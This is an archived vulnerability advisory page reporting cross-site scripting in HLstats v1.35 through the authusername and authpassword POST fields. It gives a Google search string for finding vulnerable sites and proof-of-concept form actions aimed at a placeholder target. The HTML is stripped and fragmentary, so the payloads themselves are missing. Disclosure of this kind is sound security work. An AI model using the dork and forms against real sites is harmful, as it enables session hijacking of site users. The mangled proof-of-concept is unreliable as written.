TUCoPS :: HP Unsorted H :: tb11007.htm

HLstats v1.35 Cross-Site Scripting Vulnerability #3
RedLevel Advisory #020 - HLstats v1.35 Cross-Site Scripting Vulnerability #3
RedLevel Advisory #020 - HLstats v1.35 Cross-Site Scripting Vulnerability #3





HLstats v1.35 - Cross-Site Scripting Vulnerability #3




HLstats v1.35 - Cross-Site Scripting Vulnerability #3

discovered by John">href="http://john-martinelli.com">John Martinelli of RedLevel">href="http://redlevel.org">RedLevel Security

 
Google d0rk: "generated">href="http://www.google.com/search?q=%22generated+in+real-time+by+hlstats%22">"generated in real-time by HLstats" 






file hlstats.php - variable authusername - method post



action="http://www.target.com/hlstats/hlstats.php?mode=admin&act_sort=description&act_sortorder=asc&weap_sort=code&weap_sortorder=asc" method="post"> 










file hlstats.php - variable authpassword - method post



action="http://www.target.com/hlstats/hlstats.php?mode=admin&act_sort=description&act_sortorder=asc&weap_sort=code&weap_sortorder=asc" method="post">

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH